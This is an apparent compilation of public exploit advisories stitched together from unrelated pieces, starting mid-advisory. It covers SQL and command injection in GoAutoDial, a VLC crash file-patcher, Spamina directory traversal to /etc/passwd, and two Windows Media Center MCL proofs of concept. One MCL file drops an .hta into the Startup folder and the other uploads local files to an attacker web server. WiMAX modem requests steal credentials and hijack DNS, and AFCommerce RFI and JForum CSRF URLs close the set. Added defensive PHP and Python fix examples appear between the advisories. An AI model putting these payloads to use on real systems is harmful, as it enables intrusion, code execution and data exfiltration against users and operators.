$stmt="SELECT count(*) from web_client_sessions where session_name='$session_name' and server_ip='$server_ip';";
.
.
The if statement is bypassed very easily: we only need to provide inputs longer than 6 and longer than 12 characters respectively.
The parameters are then passed to the SQL query and we have SQL injection again.

The same vulnerability was found in:

conf_extn_check.php
inbound_popup.php
live_extn_check.php
manager_send.php
park_calls_display.php
active_list_refresh.php


++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


SCRIPT_multirecording_AJAX.php SQL injection

.
.
.
if (isset($_GET["campaign"]))	{$campaign=$_GET["campaign"];}
	elseif (isset($_POST["campaign"]))	{$campaign=$_POST["campaign"];}
.
.
.
$stmt="select campaign_rec_filename from vicidial_campaigns where campaign_id='$campaign'";

Again, $campaign is not sanitized.


++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


recording_lookup.php SQL injection
.
.
if (isset($_GET["QUERY_recid"]))		{$QUERY_recid=$_GET["QUERY_recid"];}
elseif (isset($_POST["QUERY_recid"]))	{$QUERY_recid=$_POST["QUERY_recid"];}
.
.
$stmt="select recording_id,lead_id,user,filename,location,start_time,length_in_sec from recording_log where filename LIKE \"%$QUERY_recid%\" order by recording_id desc LIMIT 1;";
$QUERY_recid is not sanitized.


++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


vicidial_sales_viewer.php SQL injection, command injection
The $dcampaign parameter is not sanitized.

.
.
if (isset($_GET["dcampaign"]))				{$dcampaign=$_GET["dcampaign"];}
elseif (isset($_POST["dcampaign"]))			{$dcampaign=$_POST["dcampaign"];}
.
.
$stmt="select campaign_id, campaign_name from vicidial_campaigns where campaign_id='$dcampaign'"; // Here we have the sql injection
.
.
passthru("$WeBServeRRooT/vicidial/spreadsheet_sales_viewer.pl $list_ids $sales_number $timestamp $forc $now $dcampaign"); // Command injection



https://www.infogen.al/ - Infogen AL
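The fix is the same for the ECommerceMajor productdtl.php query earlier on this page and for the GoAutoDial report-log, campaign and passthru() cases above, so one added example (not code from either project) covers both. It rebuilds the patterns against an in-memory SQLite database through PDO (assumes php-cli with pdo_sqlite; PDO is used because the mysql_* functions the originals call were removed in PHP 7), with table names taken from the advisories and constructed rows.

```php
<?php
// Added example, not code from ECommerceMajor or GoAutoDial. Each vulnerable
// pattern from the advisories is shown beside its parameterised form.
// Assumes php-cli with the pdo_sqlite extension. Rows are constructed data.

function make_db(): PDO {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE purchase (id INTEGER PRIMARY KEY, name TEXT, secret TEXT)');
    $db->exec("INSERT INTO purchase VALUES (1, 'widget', 'none'), (2, 'gadget', 'card-on-file')");
    return $db;
}

// productdtl.php as shipped: the request value becomes part of the SQL text.
function vulnerable_product_lookup(PDO $db, string $prodid): array {
    $sql = "select * from purchase where id=$prodid order by id desc";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Fixed: the id is validated, then bound as an integer; the SQL text is constant.
function safe_product_lookup(PDO $db, string $prodid): array {
    if (!preg_match('/^\d{1,10}$/', $prodid)) {
        return []; // not a product id at all; reject before touching the DB
    }
    $stmt = $db->prepare('SELECT * FROM purchase WHERE id = :id ORDER BY id DESC');
    $stmt->bindValue(':id', (int) $prodid, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// GoAutoDial's vicidial_report_log insert: REMOTE_ADDR, User-Agent and Referer
// are attacker-controlled request data and must be bound like any other input.
function safe_report_log_insert(PDO $db, array $server, string $report_name): int {
    $db->exec('CREATE TABLE IF NOT EXISTS vicidial_report_log (
        event_date TEXT, ip_address TEXT, report_name TEXT, browser TEXT, referer TEXT)');
    $stmt = $db->prepare("INSERT INTO vicidial_report_log
        (event_date, ip_address, report_name, browser, referer)
        VALUES (datetime('now'), :ip, :report, :ua, :ref)");
    $stmt->execute([
        ':ip'     => $server['REMOTE_ADDR']     ?? '',
        ':report' => $report_name,
        ':ua'     => $server['HTTP_USER_AGENT'] ?? '',
        ':ref'    => $server['HTTP_REFERER']    ?? '',
    ]);
    return (int) $db->query('SELECT count(*) FROM vicidial_report_log')->fetchColumn();
}

// vicidial_sales_viewer.php hands $dcampaign straight to passthru(). An allowlist
// on the campaign id plus escapeshellarg() for every argument keeps each value a
// single shell word, so "; id" style suffixes never reach the shell as commands.
function build_sales_viewer_cmd(string $root, string $dcampaign): string {
    if (!preg_match('/^[A-Za-z0-9_-]{1,20}$/', $dcampaign)) {
        throw new InvalidArgumentException('invalid campaign id');
    }
    return escapeshellarg("$root/vicidial/spreadsheet_sales_viewer.pl")
         . ' ' . escapeshellarg($dcampaign);
}

$db = make_db();
$crafted = '1 or 1=1 --';   // SQLite treats "--" as a comment, like MySQL's "-- "
printf("vulnerable lookup for '%s': %d rows\n", $crafted, count(vulnerable_product_lookup($db, $crafted)));
printf("fixed lookup for '%s':      %d rows\n", $crafted, count(safe_product_lookup($db, $crafted)));
printf("fixed lookup for '2':       %d rows\n", count(safe_product_lookup($db, '2')));

// A quote in the User-Agent is stored as data; the purchase table survives.
$ua = "x', 'y'); DROP TABLE purchase; --";
printf("report log rows after crafted UA: %d\n",
    safe_report_log_insert($db, ['HTTP_USER_AGENT' => $ua, 'REMOTE_ADDR' => '203.0.113.5'], 'call_report_export'));
printf("purchase rows still present: %d\n", count($db->query('SELECT * FROM purchase')->fetchAll()));

echo build_sales_viewer_cmd('/var/www', 'CAMP1'), PHP_EOL;
try {
    build_sales_viewer_cmd('/var/www', 'CAMP1; id');
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}
```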
            
// source: https://www.securityfocus.com/bid/64626/info

VLC Media Player is prone to a denial-of-service vulnerability.

Successful exploits may allow attackers to crash the affected application, denying service to legitimate users.

VLC Media Player 1.1.11 is vulnerable; other versions may also be affected. 

# Exploit Title: VLC v. 1.1.11 .eac3 DOS
# Date: 3/14/2012
# Author: Dan Fosco
# Vendor or Software Link: www.videolan.org
# Version: 1.1.11
# Category:: local
# Google dork: n/a
# Tested on: Windows XP SP3 (64-bit)
# Demo site: n/a

#include <stdio.h>

int main(int argc, char *argv[])
{
	FILE *f;
	if (argc < 2) {
		fprintf(stderr, "usage: %s <file.eac3>\n", argv[0]);
		return 1;
	}
	f = fopen(argv[1], "r+b");
	if (f == NULL) {
		perror("fopen");
		return 1;
	}
	/* overwrite byte 5 of the existing sample with a zero */
	fseek(f, 5, SEEK_SET);
	fputc('\x00', f);
	fclose(f);
	return 0;
}

// this code patches an existing .eac3 file; samples can be found on the VideoLAN FTP server
            
source: https://www.securityfocus.com/bid/64693/info

SPAMINA Cloud Email Firewall is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input.

A remote attacker could exploit the vulnerability using directory-traversal characters ('../') to access arbitrary files that contain sensitive information. Information harvested may aid in launching further attacks.

SPAMINA Cloud Email Firewall 3.3.1.1 is vulnerable; other versions may also be affected. 

https://www.example.com/?action=showHome&language=../../../../../../../../../../etc/passwd%00.jpg
https://www.example.com/multiadmin/js/lib/?action=../../../../../../../../../../etc/passwd&language=de
https://www.example.com/index.php?action=userLogin&language=../../../../../../../../../../etc/passwd.jpg 
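An added example, not Spamina's code, of resolving a user-supplied language parameter so that the three requests above are refused. It assumes language files are stored as <code>.php under one directory and builds that directory with two constructed files so it runs stand-alone.

```php
<?php
// Added example, not Spamina's code. The 'language' value is validated before it
// is allowed anywhere near the filesystem. Assumptions: language files live at
// <baseDir>/<code>.php (constructed layout); php-cli with write access to the
// temp directory.

function resolve_language_file(string $baseDir, string $language): ?string {
    // 1. Embedded NUL: "../../etc/passwd%00.jpg" relies on the byte after urldecode
    //    truncating the name at the C-level open(), so the ".jpg" suffix passes a
    //    naive extension check. Recent PHP refuses such paths itself; rejecting here
    //    makes the reason explicit and loggable.
    if (strpos($language, "\0") !== false) {
        return null;
    }
    // 2. Allowlist the shape of a language code ("de", "en_US"); anything with a
    //    slash, dot or ".." never matches.
    if (!preg_match('/^[a-z]{2}(?:_[A-Z]{2})?$/', $language)) {
        return null;
    }
    // 3. Canonicalise and confirm the result still lies inside the base directory,
    //    which also catches a symlinked language file pointing elsewhere.
    $base      = realpath($baseDir);
    $candidate = realpath($baseDir . DIRECTORY_SEPARATOR . $language . '.php');
    if ($base === false || $candidate === false) {
        return null;
    }
    if (strncmp($candidate, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $candidate;
}

// Constructed fixture: two language files in a throwaway directory.
$dir = sys_get_temp_dir() . '/lang_example_' . getmypid();
mkdir($dir, 0700);
file_put_contents("$dir/de.php", "<?php return ['greeting' => 'Hallo'];");
file_put_contents("$dir/en.php", "<?php return ['greeting' => 'Hello'];");

$requests = [
    'de',
    'en_US',                                                          // well-formed, no such file
    urldecode('../../../../../../../../../../etc/passwd%00.jpg'),     // first request above
    '../../../../../../../../../../etc/passwd',                       // second request above
    '../../../../../../../../../../etc/passwd.jpg',                   // third request above
];
foreach ($requests as $language) {
    $resolved = resolve_language_file($dir, $language);
    printf("%-52s -> %s\n", addcslashes($language, "\0"), $resolved ?? 'rejected');
}

unlink("$dir/de.php");
unlink("$dir/en.php");
rmdir($dir);
```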
            
Title: Microsoft Windows Media Center Library Parsing RCE Vuln aka "self-executing" MCL file (CVE-2015-6131)

Software Vendor: Microsoft

Software version : MS Windows Media Center latest version on any Windows OS.

Software Vendor Homepage: http://www.microsoft.com

CVE: CVE-2015-6131

Exploit Author: Eduardo Braun Prado

Vulnerability official discoverer: Zhang YunHai of NSFOCUS Security Team

Date: December 8, 2015

Vulnerability description:

Windows Media Center contains a remote code execution vulnerability because it allows "MCL" files to reference themselves as HTML pages, which are then parsed inside the Windows Media Center window in the context of Internet Explorer's Local Machine security zone. This in turn allows execution of arbitrary code using, e.g., ADO ActiveX objects. AKA "self-executing" MCL files.


Exploit code below:

----------- self-exec-1.mcl ------------------------------------

<application url="self-exec1.mcl"/><html><script>alert(' I am running in local machine zone which allows arbitrary code execution via, for example, ADO Objects')</script></html>

------------------------------------------------------------

----------self-exec-2.mcl--------------------------------------

<application url="self-exec2.mcl"/><html><b>Use a sniffer software to sniff SMB traffic and retrieve the remote Windows username required for this exploit</b><img src=\\192.168.10.10\smbshare\someimg.jpg></img><script> RecordsetURL='http://192.168.10.10:80/recordsetfile.txt'; var rs = new ActiveXObject('ADODB.recordset'); rs.Open(RecordsetURL); rs.Save('C:/users/windowsuser/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/poc.hta'); rs.Close();
</script></html>
----------------------------------------------------------

-----Create-recordsetfile.hta --------------

<html><body onload="aa()">

<script language="VBScript">

function aa()

defdir="."

alert "This script will retrieve data from ""recordsetdata.txt"" and save it to the current directory as ""recordsetfile.txt""."

Set c = CreateObject("ADODB.Connection")
co = "Driver={Microsoft Text Driver (*.txt; *.csv)};DefaultDir=" & defdir & ";Extensions=txt;"
c.Open co
Set rs = CreateObject("ADODB.Recordset")
rs.Open "SELECT * from recordsetdata.txt", c
rs.Save defdir & "\recordsetfile.txt"
rs.Close

end function
</script></body></html>

-------------------------------------------------------------------------------


---------recordsetdata.txt------------------------------------------

<html>
<script>a=new ActiveXObject('Wscript.Shell')</script>
<script>a.Run('calc.exe',1);</script>
</html>
-------------------------------------------------------------------
            
1. Advisory Information

Title: Microsoft Windows Media Center link file incorrectly resolved reference
Advisory ID: CORE-2015-0014
Advisory URL: http://www.coresecurity.com/advisories/microsoft-windows-media-center-link-file-incorrectly-resolved-reference
Date published: 2015-12-08
Date of last update: 2015-12-04
Vendors contacted: Microsoft
Release mode: Coordinated release

2. Vulnerability Information

Class: Use of Incorrectly-Resolved Name or Reference [CWE-706]
Impact: Information leak
Remotely Exploitable: No
Locally Exploitable: Yes
CVE Name: CVE-2015-6127

 

3. Vulnerability Description

The 'application' tag in Microsoft [1] Windows Media Center link files (.mcl extension) can include a 'run' parameter, which indicates the path of a file to be launched when opening the MCL file, or a 'url' parameter, which indicates the URL of a web page to be loaded within the Media Center's embedded web browser.

A specially crafted MCL file having said 'url' parameter pointing to the MCL file itself can trick Windows Media Center into rendering the very same MCL file as a local HTML file within the Media Center's embedded web browser.

4. Vulnerable Packages

Windows 7 for x64-based Systems Service Pack 1 (with Internet Explorer 11 installed)
Other versions are probably affected too, but they were not checked.

5. Vendor Information, Solutions and Workarounds

Microsoft posted the following Security Bulletin: MS15-134 [2]

6. Credits

This vulnerability was discovered and researched by Francisco Falcon from Core Exploits Team. The publication of this advisory was coordinated by Joaquín Rodríguez Varela from the Core Advisories Team.

 

7. Technical Description / Proof of Concept Code

The ehexthost.exe binary, part of Windows Media Center, loads the given URL into an embedded instance of Internet Explorer running in the Local Machine zone, but it does not opt in to the FEATURE_LOCALMACHINE_LOCKDOWN IE security feature. An attacker can therefore leverage this to read and exfiltrate arbitrary files from a victim's local filesystem by convincing the victim to open a malicious MCL file.

The proof of concept is an MCL file with embedded HTML + JS code that references itself in the 'url' parameter. Unlike what happens when a local HTML file is loaded into Internet Explorer 11, the JS code included here runs automatically with no prompts, and it is able to read arbitrary local files using the MSXML2.XMLHTTP ActiveX object. The files read this way can then be uploaded to an arbitrary remote web server.

Also note that, in order for the PoC to work, the value of the 'url' parameter must match the name of the MCL file.

7.1. Proof of Concept

A new file should be created with the name "poc-microsoft.mcl" and with the following content:

 
<application url="poc-microsoft.mcl"
name="Showcase"
bgcolor="RGB(255,255,255)"
sharedviewport="false">
<html>
<head>
<meta http-equiv="x-ua-compatible" content="IE=edge" >
</head>
<body>
<script type="text/javascript">

    function do_upload(fname, data){
        // Exfiltrate the bytes read from disk to the attacker's web server
        // (192.168.1.50 in this PoC).
        var xmlhttp = new XMLHttpRequest();
        xmlhttp.open("POST", "http://192.168.1.50/uploadfile.php", true);
        xmlhttp.setRequestHeader("Content-type", "multipart/form-data");
        xmlhttp.setRequestHeader("Connection", "close");
        xmlhttp.onreadystatechange = function(){if (xmlhttp.readyState == 4){alert(fname + " done.");}}
        xmlhttp.send(new Uint8Array(data));
    }


    function read_local_file(filename){
        /* Must use this one: XMLHttpRequest() does not allow reading local files */
        var xmlhttp = new ActiveXObject("MSXML2.XMLHTTP");
        xmlhttp.open("GET", filename, false);
        xmlhttp.send();
        return xmlhttp.responseBody.toArray();
    }


    function upload_file(filename){
        // Read a local file and upload it; any failure is shown in an alert.
        try{
            do_upload(filename, read_local_file(filename));
        }catch(e){
            alert(filename + " error: " + e);
        }
    }


    // Any file readable by the logged-on user can be named here.
    upload_file("file:///C:/Windows/System32/calc.exe");

</script>
</body>
</html>

</application>

8. Report Timeline

2015-09-24: Core Security sent the first notification to Microsoft.
2015-09-24: Microsoft acknowledged receipt of the email and requested a draft version of the advisory.
2015-09-25: Core Security sent Microsoft the draft version of the advisory including a PoC.
2015-09-25: Microsoft cased the report under MSRC 31305.
2015-10-02: Core Security requested Microsoft provide a status update and confirmation of the reported bug.
2015-10-02: Microsoft informed Core Security that they were able to reproduce the issue. They were still reviewing it to determine if they would address it in a security release.
2015-10-07: Core Security requested Microsoft let us know once they made a decision.
2015-10-08: Microsoft informed Core Security they would keep us updated.
2015-10-26: Core Security asked Microsoft if there were any updates regarding the reported bug and if they had an estimated time of availability.
2015-10-27: Microsoft informed Core Security that they would be pursuing a fix for the reported issue and are working on a release date for it.
2015-11-05: Core Security asked Microsoft if they had determined a release date for the fix and a CVE ID to the reported vulnerability.
2015-11-10: Microsoft informed Core Security that they were targeting the security fix for this issue in their December release. They also informed us that they assigned CVE-2015-6127 to this case.
2015-11-11: Core Security thanked Microsoft for their reply and clarified that we would be publishing the advisory on Tuesday, the 8 of December, 2015.
2015-11-12: Microsoft requested from Core Security the link where the advisory would be published and the name of the researcher that should appear in the acknowledgment.
2015-11-13: Core Security informed Microsoft of the link and name that should appear in the acknowledgment.
2015-11-16: Microsoft informed Core Security that they updated the CVE acknowledgment accordingly.
2015-12-08: Advisory CORE-2015-0014 published.

9. References

[1] http://www.microsoft.com/
[2] https://technet.microsoft.com/library/security/MS15-134

10. About CoreLabs

CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.

11. About Core Security

Core Security enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations.

Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com.

12. Disclaimer

The contents of this advisory are copyright (c) 2015 Core Security and (c) 2015 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/

13. PGP/GPG Keys

This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc.



_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
### Exploit Title: WIMAX LX350P(WIXFMR-108) - Multiple Vulnerabilities
### Date: Friday, December 11, 2015
### Exploit/Vulnerability Author: Alireza Azimzadeh Milani (alimp5)
### Vendor Homepage: http://www.greenpacket.com
### Version: v2.10.14-g1.5.2
### Tested on: Kali-Linux

I'm an ethical penetration tester and super moderator of Iran Security Team (http://irsecteam.org).
I have updated the modem to the latest firmware released by the company,
but even with this work (upgrading the firmware), the attacker can bypass the authentication mechanism.

### Details of LX350P model:
Device Information:
Hardware model:	WIXFMR-108
Firmware version:	v2.10.14-g1.5.2-mobinnet
Firmware version:	v2.10.14-g1.5.2
Firmware creation date:	Mon Aug 15 16:45:58 2013
Frequency range:	3300000KHz~3600000KHz
Serial number:	DXHKC120702523

I used the tools below to find the vulnerabilities:
1) Burp Suite - Free Edition
2) wget
3) Nmap


### POCs of the modem:
# Get WiMAX credentials >>
wget -c "http://server/ajax.cgi?action=tag_init_wimax_auth.php"

# Enable and change the DMZ host IP in the firewall (request manipulated with Burp Suite) >>
POST /ajax.cgi?action=net_firewall HTTP/1.1
Host: server
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: Language=en; page=net_firewall.php
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 113

NETFILTER_FW_IPFILTER=&MGMT_WEB_WAN=on&MGMT_TELNET_WAN=on&NETFILTER_DMZ_HOST=8.8.8.8&btnSubmit=1

# Ping a system (the queries below can be used to launch (D)DoS attacks) >>
http://server/ajax.cgi?action=tag_ipPing&pip=4.2.2.4&cache=false
http://server/ajax.cgi?action=tag_ipPing&pip=192.168.1.1&cache=false

# Get info about the WAN MAC, LAN MAC, DHCP settings and more >>
http://server/ajax.cgi?action=tag_init_net_dhcp.php&cache=false

# Change the DNS IP addresses (DNS hijacking, spoofing) >>
POST /ajax.cgi?action=net_dhcp HTTP/1.1
Host: server
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: Language=en; page=net_dhcp.php
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 945

DHCPD_STATIC_LEASE=&DHCPD_ENABLE=1&DHCPD_START_IP_01=192&DHCPD_START_IP_02=168&DHCPD_START_IP_03=1&DHCPD_START_IP_04=2&DHCPD_START_IP=192.168.1.2&DHCPD_END_IP_01=192&DHCPD_END_IP_02=168&DHCPD_END_IP_03=1&DHCPD_END_IP_04=200&DHCPD_END_IP=192.168.1.200&dns_type_1=2&DNS_IP_1_01=6&DNS_IP_1_02=6&DNS_IP_1_03=6&DNS_IP_1_04=6&DNS_IP_1=6.6.6.6&dns_type_2=2&DNS_IP_2_01=8&DNS_IP_2_02=8&DNS_IP_2_03=8&DNS_IP_2_04=8&DNS_IP_2=8.8.8.8&dns_type_3=1&DNS_IP_3_01=0&DNS_IP_3_02=0&DNS_IP_3_03=0&DNS_IP_3_04=0&DNS_IP_3=&DHCPD_LEASE_TIME=1440&btnSubmit=1&DHCPD_DNS=2%2C6.6.6.6+2%2C8.8.8.8+1%2C0.0.0.0&ippt_enable=0&Active_0=Y&Interface_0=1&Protocol_0=1&SrcPort_0=68&DestPort_0=67&Comment_0=DHCP+request+from+lan&Active_1=Y&Interface_1=2&Protocol_1=1&SrcPort_1=67&DestPort_1=68&Comment_1=DHCP+response+from+wan&IPPT_EXCEPTION=1%2CY%2C1%2C1%2C68%2C67%2CDHCP+request+from+lan%3B2%2CY%2C2%2C1%2C67%2C68%2CDHCP+response+from+wan%3B&IPPT_EXCEPTION_NUM=2

# Frame injection (the 'action' parameter is reflected into the response) >>
http://server/ajax.cgi?action=<iframe src="http://r87.com/?"></iframe>&sid=DtTrEZnLke5Z&cache=false&time=1449547319726  
http://server/ajax.cgi?action=<iframe src="http://r87.com/?"></iframe>&sid=DtTrEZnLke5Z&cache=false
http://server/ajax.cgi?action=<iframe src="http://r87.com/?"></iframe>cache=false
http://server/ajax.cgi?action=<iframe src="http://r87.com/?"></iframe>&time=3  
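The two defects the POCs above rely on, an ajax.cgi that answers without any login and an unknown 'action' value that is reflected into the response, can be reproduced side by side with a hardened dispatcher. The Python below is an added example written for this page, not the device's firmware: the action names and request URLs are taken from the requests above, while the response texts, the allow-list and the `authenticated` flag (standing in for whatever session check the device performs) are assumptions.

```python
import html
from urllib.parse import parse_qs, urlsplit

# Action names taken from the requests above. Whether the firmware keeps an
# explicit list like this is not known; it is assumed here as the allow-list.
KNOWN_ACTIONS = frozenset({
    'tag_init_wimax_auth.php',   # WiMAX credentials
    'tag_init_net_dhcp.php',     # WAN/LAN MAC, DHCP details
    'net_firewall',              # DMZ host, WAN-side web/telnet management
    'net_dhcp',                  # DHCP range and DNS servers
    'tag_ipPing',                # ping from the device
})

# Request URLs copied from the POCs above.
CREDENTIALS_REQUEST = 'http://server/ajax.cgi?action=tag_init_wimax_auth.php'
FRAME_INJECTION_REQUEST = ('http://server/ajax.cgi?action=<iframe src="http://r87.com/?"></iframe>'
                           '&sid=DtTrEZnLke5Z&cache=false')


def requested_action(request_uri):
    """Extract the 'action' query parameter as the CGI would see it."""
    query = parse_qs(urlsplit(request_uri).query)
    return query.get('action', [''])[0]


def vulnerable_ajax_cgi(request_uri, authenticated=False):
    """Models the behaviour reported above: the login state is never
    consulted, and an unrecognised action is written back into the error
    page without encoding, which is what makes the iframe payload render."""
    action = requested_action(request_uri)
    if action in KNOWN_ACTIONS:
        return 200, 'handled %s' % action
    return 200, '<div class="error">Unknown action: %s</div>' % action


def hardened_ajax_cgi(request_uri, authenticated=False):
    """Same dispatcher with the missing checks: require a session first,
    accept only allow-listed actions, and never reflect the raw parameter."""
    if not authenticated:
        return 401, 'authentication required'
    action = requested_action(request_uri)
    if action not in KNOWN_ACTIONS:
        return 400, 'unknown action'          # generic message, no echo
    return 200, 'handled %s' % html.escape(action)


if __name__ == '__main__':
    for uri in (CREDENTIALS_REQUEST, FRAME_INJECTION_REQUEST):
        print('vulnerable:', vulnerable_ajax_cgi(uri))
        print('hardened  :', hardened_ajax_cgi(uri))
```

The order of checks in the hardened version matters: the session is verified before the parameter is even parsed, so an unauthenticated client learns nothing about which actions exist, and the unknown-action branch returns a fixed string so there is no reflected output to inject into.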
 

### Conclusion:
1) The attacker can read sensitive information (such as the WiMAX credentials) and set it on his own modem, for example to use the Internet for free.
2) Anyone who can send a packet to the modem can crash it, downgrade it or cause a denial of service.
3) An attacker might use the frame injection to redirect users to malicious websites used for phishing and similar attacks.
4) Control of similar modems (LX350P) can be obtained in order to launch DoS or DDoS attacks against targets on the Internet.


Finally, I am thankful and await your response.
source: https://www.securityfocus.com/bid/64541/info

AFCommerce is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied input.

An attacker can exploit these vulnerabilities to obtain potentially sensitive information or to execute arbitrary script code in the context of the web server process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. 

http://www.example.com/afcontrol/adblock.php?rootpathtocart=[RFI]
source: https://www.securityfocus.com/bid/64540/info

JForum is prone to a cross-site request-forgery vulnerability because the application does not properly validate HTTP requests.

Exploiting this issue may allow a remote attacker to perform certain unauthorized actions in the context of the affected application. Other attacks are also possible. 

http://www.example.com/forum/admBase/login.page?action=groupsSave&module=adminUsers&user_id=12696&groups=2